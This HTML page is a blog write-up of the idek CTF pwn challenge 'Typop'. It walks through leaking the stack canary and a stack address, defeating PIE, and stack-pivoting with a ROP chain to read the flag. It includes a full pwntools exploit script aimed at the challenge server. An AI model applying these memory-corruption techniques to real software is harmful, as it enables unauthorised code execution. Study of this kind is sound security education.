<!DOCTYPE html>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100..900;1,100..900&display=swap" rel="stylesheet">
<html lang="en"><head>
  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  

  <title>
    
      Typop
    
  </title>

  <!-- Begin Jekyll SEO tag v2.6.1 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="Typop" />
<meta name="author" content="David Fernandez" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@#PPGPB@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@&amp;? .J&amp;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@B~ :P@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@Y. 7#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@#7 .Y@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@P^ ~G@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@&amp;J ?&amp;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@&amp;J ?&amp;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@P^ ~G@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@#7 .Y@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@Y. 7#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@B~ :P@@@@@@@@@#55555555555555G@@@@@@@@@@@@@ @@@@@@@@@@@@@&amp;? .J&amp;@@@@@@@@@@Y ~@@@@@@@@@@@@@ @@@@@@@@@@@@@#PPGPB@@@@@@@@@@@@#PGGGGGGGGGGGGPB@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" />
<meta property="og:description" content="@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@#PPGPB@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@&amp;? .J&amp;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@B~ :P@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@Y. 7#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@#7 .Y@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@P^ ~G@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@&amp;J ?&amp;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@&amp;J ?&amp;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@P^ ~G@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@#7 .Y@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@Y. 7#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@B~ :P@@@@@@@@@#55555555555555G@@@@@@@@@@@@@ @@@@@@@@@@@@@&amp;? .J&amp;@@@@@@@@@@Y ~@@@@@@@@@@@@@ @@@@@@@@@@@@@#PPGPB@@@@@@@@@@@@#PGGGGGGGGGGGGPB@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" />
<link rel="canonical" href="http://0.0.0.0:4000/2023/01/22/typop.html" />
<meta property="og:url" content="http://0.0.0.0:4000/2023/01/22/typop.html" />
<meta property="og:site_name" content="Litios Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2023-01-22T00:00:00+01:00" />
<script type="application/ld+json">
{"headline":"Typop","url":"http://0.0.0.0:4000/2023/01/22/typop.html","datePublished":"2023-01-22T00:00:00+01:00","dateModified":"2023-01-22T00:00:00+01:00","mainEntityOfPage":{"@type":"WebPage","@id":"http://0.0.0.0:4000/2023/01/22/typop.html"},"author":{"@type":"Person","name":"David Fernandez"},"@type":"BlogPosting","description":"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@#PPGPB@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@&amp;? .J&amp;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@B~ :P@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@Y. 7#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@#7 .Y@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@P^ ~G@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@&amp;J ?&amp;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@&amp;J ?&amp;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@P^ ~G@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@#7 .Y@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@Y. 7#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@B~ :P@@@@@@@@@#55555555555555G@@@@@@@@@@@@@ @@@@@@@@@@@@@&amp;? .J&amp;@@@@@@@@@@Y ~@@@@@@@@@@@@@ @@@@@@@@@@@@@#PPGPB@@@@@@@@@@@@#PGGGGGGGGGGGGPB@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->

  <link type="application/atom+xml" rel="alternate" href="http://0.0.0.0:4000/feed.xml" title="Litios Blog" />

  <link rel="shortcut icon" type="image/x-icon" href="/./logo.ico" />
  <link rel="stylesheet" href="http://0.0.0.0:4000/assets/css/main.css" />
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons"
      rel="stylesheet">
</head>
<body a="light" style="color: #f2f2f2">
    <main class="page-content" aria-label="Content">
        <div class="w">
            <div style="display: flex; justify-content: space-between;">
<a style="font-size: 2em;" href="http://0.0.0.0:4000">..</a>
<span onClick="if (document.body.style.color != 'rgb(242, 242, 242)'){
document.body.style.color = '#f2f2f2'; document.body.style.backgroundColor = '#202324';
} else {
document.body.style.color = 'black'; document.body.style.backgroundColor = 'white';
}
" class="material-icons" style="
    cursor: pointer;
    display:flex;
    flex-direction:column;
    justify-content:end;
    align-items:center;
">visibility</span>
</div>
<br><br><br>
<pre style="font-size: 0.6rem; text-align: center">
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@#PPGPB@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@&amp;?   .J&amp;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@B~   :P@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@Y.   7#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@#7   .Y@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@P^   ~G@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@&amp;J    ?&amp;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@&amp;J    ?&amp;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@P^   ~G@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@#7   .Y@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@Y.   7#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@B~   :P@@@@@@@@@#55555555555555G@@@@@@@@@@@@@
@@@@@@@@@@@@@&amp;?   .J&amp;@@@@@@@@@@Y              ~@@@@@@@@@@@@@
@@@@@@@@@@@@@#PPGPB@@@@@@@@@@@@#PGGGGGGGGGGGGPB@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
</pre>

<hr />

<p>This was a pwn challenge rated with 408 points in idek CTF.
The instructions said:</p>

<blockquote>
  <p>While writing the feedback form for idekCTF, JW made a small typo. It still compiled though, so what could possibly go wrong?</p>
</blockquote>

<p>This binary involved handling canary and PIE protections and, in the way I solved it, stack pivoting.</p>

<hr />

<p>This is a very small binary with only a couple of functions. Let’s run it first to see what would be the normal output:</p>

<p><img src="/./assets/imgs/typop_exec.png" /></p>

<p>As we can see, we provide the answer to some questions and we can overflow the stack easily.</p>

<p>Let’s take a look at the disassembly and see the main function:</p>

<p><img src="/./assets/imgs/typop_main.png" /></p>

<p>As we expected, it <code class="language-plaintext highlighter-rouge">puts</code> the first question and <code class="language-plaintext highlighter-rouge">getchar</code> the response. If it’s 0x79 or ‘y’, then it continues and calls <code class="language-plaintext highlighter-rouge">getFeedback</code>. If not, it exits.</p>

<p>Let’s inspect <code class="language-plaintext highlighter-rouge">getFeedback</code>:</p>

<p><img src="/./assets/imgs/typop_getfeedback.png" /></p>

<p>We can quickly see where the overflow is. The <code class="language-plaintext highlighter-rouge">buf</code> to which we write is in $rbp-0x12 and in the first question already reads 0x1e. After that, it reads 0x5a, overflowing the stack.</p>

<p>The first thing we need to defeat is the canary. The answer to the second question is what gets replied to us. We can use this to print the canary by providing the exact amount of characters to concatenate the canary like so:</p>

<table>
  <thead>
    <tr>
      <th>00</th>
      <th>01</th>
      <th>02</th>
      <th>03</th>
      <th>04</th>
      <th>05</th>
      <th>06</th>
      <th>07</th>
      <th>08</th>
      <th>09</th>
      <th>0a</th>
      <th>0b</th>
      <th>0c</th>
      <th>0d</th>
      <th>0e</th>
      <th>0f</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>AA</td>
      <td>AA</td>
    </tr>
    <tr>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>CAN</td>
      <td>CAN</td>
      <td>CAN</td>
      <td>CAN</td>
      <td>CAN</td>
      <td>CAN</td>
      <td>CAN</td>
      <td>CAN</td>
    </tr>
    <tr>
      <td>RBP</td>
      <td>RBP</td>
      <td>RBP</td>
      <td>RBP</td>
      <td>RBP</td>
      <td>RBP</td>
      <td>RBP</td>
      <td>RBP</td>
      <td>RSP</td>
      <td>RSP</td>
      <td>RSP</td>
      <td>RSP</td>
      <td>RSP</td>
      <td>RSP</td>
      <td>RSP</td>
      <td>RSP</td>
    </tr>
  </tbody>
</table>

<p>A \n char will be added at the end so it will be:</p>

<table>
  <thead>
    <tr>
      <th>00</th>
      <th>01</th>
      <th>02</th>
      <th>03</th>
      <th>04</th>
      <th>05</th>
      <th>06</th>
      <th>07</th>
      <th>08</th>
      <th>09</th>
      <th>0a</th>
      <th>0b</th>
      <th>0c</th>
      <th>0d</th>
      <th>0e</th>
      <th>0f</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>AA</td>
      <td>AA</td>
    </tr>
    <tr>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>0a</td>
      <td>CAN</td>
      <td>CAN</td>
      <td>CAN</td>
      <td>CAN</td>
      <td>CAN</td>
      <td>CAN</td>
      <td>CAN</td>
    </tr>
    <tr>
      <td>RBP</td>
      <td>RBP</td>
      <td>RBP</td>
      <td>RBP</td>
      <td>RBP</td>
      <td>RBP</td>
      <td>RBP</td>
      <td>RBP</td>
      <td>RSP</td>
      <td>RSP</td>
      <td>RSP</td>
      <td>RSP</td>
      <td>RSP</td>
      <td>RSP</td>
      <td>RSP</td>
      <td>RSP</td>
    </tr>
  </tbody>
</table>

<p>Therefore we will rely on the chances of the canary ending up in 0x00. It will reply something like: <code class="language-plaintext highlighter-rouge">AAAAAAAAAAA\xAB\xCD\xEF\x0a...</code> with the last part being the canary, until it founds a \x00.</p>

<blockquote>
  <p>One important thing to consider is that the canary is the same during the whole execution and therefore dumping it once will allow to reuse it</p>
</blockquote>

<p>Now that we have the canary, we can overflow rbp and rsp to control execution. But what can we do with what? PIE is enabled and we don’t know what the offset is.</p>

<p>But, we cano d the same technique again to dump rsp value because <code class="language-plaintext highlighter-rouge">getFeedback</code> is executed in a loop in main. In this case, it would look like:</p>

<table>
  <thead>
    <tr>
      <th>00</th>
      <th>01</th>
      <th>02</th>
      <th>03</th>
      <th>04</th>
      <th>05</th>
      <th>06</th>
      <th>07</th>
      <th>08</th>
      <th>09</th>
      <th>0a</th>
      <th>0b</th>
      <th>0c</th>
      <th>0d</th>
      <th>0e</th>
      <th>0f</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>00</td>
      <td>AA</td>
      <td>AA</td>
    </tr>
    <tr>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
    </tr>
    <tr>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>AA</td>
      <td>00</td>
      <td>RSP</td>
      <td>RSP</td>
      <td>RSP</td>
      <td>RSP</td>
      <td>RSP</td>
      <td>RSP</td>
      <td>RSP</td>
    </tr>
  </tbody>
</table>

<p>We don’t really care about the last bytes of rsp, we only want the offset. But with that we can control the execution.</p>

<p>The target of this pwn challenge is to call win:</p>

<p><img src="/./assets/imgs/typop_win.png" /></p>

<p>This function will take 3 arguments, each of those a char, which will be concatenated to ‘g.txt’. As we can see in the attachments, flag.txt is the name of the flag. Therefore, we can send ‘f’, ‘l’ and ‘a’ as the arguments, read the contents and have everything dumped. For that we can do ROP: find the gadgets, add the offset and get everything in the right registers.</p>

<p>But after running <a href="https://github.com/JonathanSalwan/ROPgadget">ROPGadget</a> we can see that there is no way to pop a value to <code class="language-plaintext highlighter-rouge">rdx</code> and therefore we can’t control the last argument.</p>

<p>Let’s change the approach. The filename is loaded from a string in $rbp-0x4a. The mode is hardcoded so we don’t have to worry about that.</p>

<p>We know we can control rbp so we can do a stack pivot and then jump exactly to where the filename is loaded from rbp, in 0x000012ac. We are dumping the old $rbp when we dump the canary. We can substract 0x200 (or any value really) to get an empty area as our new fake stack.</p>

<p>Then we can write a string to that area by calling <code class="language-plaintext highlighter-rouge">read</code>. We can control rdi (stdin, \x00), rsi (where to write) and call <code class="language-plaintext highlighter-rouge">read</code>. We can’t control rdx (the amount of bytes to read) but that would be 0x5a from previously calling <code class="language-plaintext highlighter-rouge">read</code> in <code class="language-plaintext highlighter-rouge">getFeedback</code>.</p>

<p>So the exploit will work like this:</p>

<ol>
  <li>Do a first run of <code class="language-plaintext highlighter-rouge">getFeedback</code> to get the canary</li>
  <li>Leave $rpb and $rsp as it is on the second question and provide the right canary.</li>
  <li>Do a second run of <code class="language-plaintext highlighter-rouge">getFeedback</code> and get $rsp to get the offset.</li>
  <li>Provide the canary, overflow $rbp with the new stack value and $rsp to do the ROP: the <code class="language-plaintext highlighter-rouge">pop rdi</code> gadget, <code class="language-plaintext highlighter-rouge">\x00</code> * 8  (stdin value is 0), the <code class="language-plaintext highlighter-rouge">pop rsi; pop r15</code> gadget, the address where to write (our new stack address - 0x4a), <code class="language-plaintext highlighter-rouge">\x00</code> * 8 for the <code class="language-plaintext highlighter-rouge">pop r15</code>, the address of <code class="language-plaintext highlighter-rouge">read</code> and finally the exact position we want in <code class="language-plaintext highlighter-rouge">win</code>.</li>
</ol>

<p>With that, we can craft the exploit:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="n">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">import</span> <span class="n">time</span>

<span class="c1">#b = process('./chall')
</span><span class="n">b</span> <span class="o">=</span> <span class="nf">remote</span><span class="p">(</span><span class="sh">"</span><span class="s">typop.chal.idek.team</span><span class="sh">"</span><span class="p">,</span> <span class="mi">1337</span><span class="p">)</span>
<span class="c1">#gdb.attach(b,  gdbscript='b *getFeedback+178')
#gdb.attach(b,  gdbscript='b *win+220')
</span>
<span class="k">def</span> <span class="nf">parse_addresses</span><span class="p">(</span><span class="n">data</span><span class="p">):</span>
    <span class="n">stack_address</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">8</span><span class="p">:]</span>
    <span class="n">stack_address</span> <span class="o">=</span> <span class="n">stack_address</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x00</span><span class="sh">'</span> <span class="o">*</span> <span class="p">(</span><span class="mi">8</span> <span class="o">-</span> <span class="nf">len</span><span class="p">(</span><span class="n">stack_address</span><span class="p">))</span>

    <span class="n">canary</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">1</span><span class="p">:</span><span class="mi">8</span><span class="p">]</span>
    <span class="n">canary</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x00</span><span class="sh">'</span> <span class="o">*</span> <span class="p">(</span><span class="mi">8</span> <span class="o">-</span> <span class="nf">len</span><span class="p">(</span><span class="n">canary</span><span class="p">))</span> <span class="o">+</span> <span class="n">canary</span>
    <span class="k">return</span> <span class="n">stack_address</span><span class="p">,</span> <span class="n">canary</span>

<span class="k">def</span> <span class="nf">parse_rsp</span><span class="p">(</span><span class="n">data</span><span class="p">):</span>
    <span class="n">rsp</span> <span class="o">=</span> <span class="n">data</span>
    <span class="n">rsp</span> <span class="o">=</span> <span class="n">rsp</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x00</span><span class="sh">'</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x00</span><span class="sh">'</span> 
    <span class="k">return</span> <span class="n">rsp</span>

<span class="n">b</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="n">b</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">?</span><span class="se">\n</span><span class="sh">'</span><span class="p">))</span>
<span class="n">b</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">y</span><span class="se">\n</span><span class="sh">'</span><span class="p">)</span>
<span class="n">b</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="n">b</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">?</span><span class="se">\n</span><span class="sh">'</span><span class="p">))</span>
<span class="n">b</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">AAAAAAAAAA</span><span class="se">\n</span><span class="sh">'</span><span class="p">)</span>

<span class="n">data</span> <span class="o">=</span> <span class="n">b</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">Aww</span><span class="sh">'</span><span class="p">)[</span><span class="mi">20</span><span class="p">:</span><span class="o">-</span><span class="mi">4</span><span class="p">]</span>
<span class="n">b</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">?</span><span class="sh">'</span><span class="p">)</span>

<span class="n">stack_address</span><span class="p">,</span> <span class="n">canary</span> <span class="o">=</span> <span class="nf">parse_addresses</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
<span class="n">canary</span> <span class="o">=</span> <span class="nf">u64</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span>
<span class="n">b</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="nf">str</span><span class="p">(</span><span class="nf">hex</span><span class="p">(</span><span class="n">canary</span><span class="p">)))</span>

<span class="n">b</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">B</span><span class="sh">'</span><span class="o">*</span><span class="mi">10</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">canary</span><span class="p">))</span>
<span class="n">b</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="n">b</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">?</span><span class="se">\n</span><span class="sh">'</span><span class="p">))</span>
<span class="n">b</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">y</span><span class="se">\n</span><span class="sh">'</span><span class="p">)</span>
<span class="n">b</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="n">b</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">?</span><span class="se">\n</span><span class="sh">'</span><span class="p">))</span>
<span class="n">b</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">AAAAAAAAAAAAAAAAAAAAAAAAA</span><span class="se">\n</span><span class="sh">'</span><span class="p">)</span>

<span class="n">data</span> <span class="o">=</span> <span class="n">b</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">Aww</span><span class="sh">'</span><span class="p">)[</span><span class="mi">36</span><span class="p">:</span><span class="o">-</span><span class="mi">4</span><span class="p">]</span>
<span class="n">b</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">?</span><span class="sh">'</span><span class="p">)</span>

<span class="n">rsp</span> <span class="o">=</span> <span class="nf">parse_rsp</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
<span class="n">b</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="nf">str</span><span class="p">(</span><span class="nf">len</span><span class="p">(</span><span class="n">rsp</span><span class="p">)))</span>
<span class="n">rsp</span> <span class="o">=</span> <span class="nf">u64</span><span class="p">(</span><span class="n">rsp</span><span class="p">)</span>
<span class="n">b</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="nf">str</span><span class="p">(</span><span class="nf">hex</span><span class="p">(</span><span class="n">rsp</span><span class="p">)))</span>

<span class="n">base_address</span> <span class="o">=</span> <span class="n">rsp</span> <span class="o">-</span> <span class="mi">5191</span>
<span class="n">win</span> <span class="o">=</span> <span class="n">rsp</span> <span class="o">-</span> <span class="mi">510</span>
<span class="n">pop_rdi</span> <span class="o">=</span> <span class="mh">0x00000000000014d3</span>
<span class="n">pop_rsi_r15</span> <span class="o">=</span> <span class="mh">0x00000000000014d1</span>
<span class="n">ret</span> <span class="o">=</span> <span class="mh">0x000000000000101a</span>
<span class="n">pop_rsp</span> <span class="o">=</span> <span class="mh">0x00000000000014cd</span>
<span class="n">new_stack_address</span> <span class="o">=</span> <span class="nf">p64</span><span class="p">(</span> <span class="nf">u64</span><span class="p">(</span><span class="n">stack_address</span><span class="p">)</span> <span class="o">-</span> <span class="mh">0x2000</span><span class="p">)</span>
<span class="n">b</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">B</span><span class="sh">'</span><span class="o">*</span><span class="mi">10</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span> <span class="o">+</span> <span class="n">new_stack_address</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">pop_rdi</span> <span class="o">+</span> <span class="n">base_address</span><span class="p">)</span>  <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x00</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">8</span> <span class="o">+</span>  <span class="nf">p64</span><span class="p">(</span><span class="n">pop_rsi_r15</span> <span class="o">+</span> <span class="n">base_address</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="nf">u64</span><span class="p">(</span><span class="n">new_stack_address</span><span class="p">)</span> <span class="o">-</span> <span class="mh">0x4a</span><span class="p">)</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x00</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">8</span> <span class="o">+</span>  <span class="nf">p64</span><span class="p">(</span><span class="n">base_address</span> <span class="o">-</span> <span class="mi">784</span> <span class="o">+</span> <span class="mi">5136</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">win</span> <span class="o">+</span> <span class="mi">99</span><span class="p">))</span>

<span class="n">time</span><span class="p">.</span><span class="nf">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span>
<span class="n">b</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">flag.txt</span><span class="sh">'</span><span class="p">)</span>

<span class="nf">print</span><span class="p">(</span><span class="n">b</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="se">\n</span><span class="sh">'</span><span class="p">))</span>
<span class="n">b</span><span class="p">.</span><span class="nf">interactive</span><span class="p">()</span>

</code></pre></div></div>

<p><img src="/./assets/imgs/typop_solved.png" /></p>


        </div>
    </main>

    
    </body>
</html>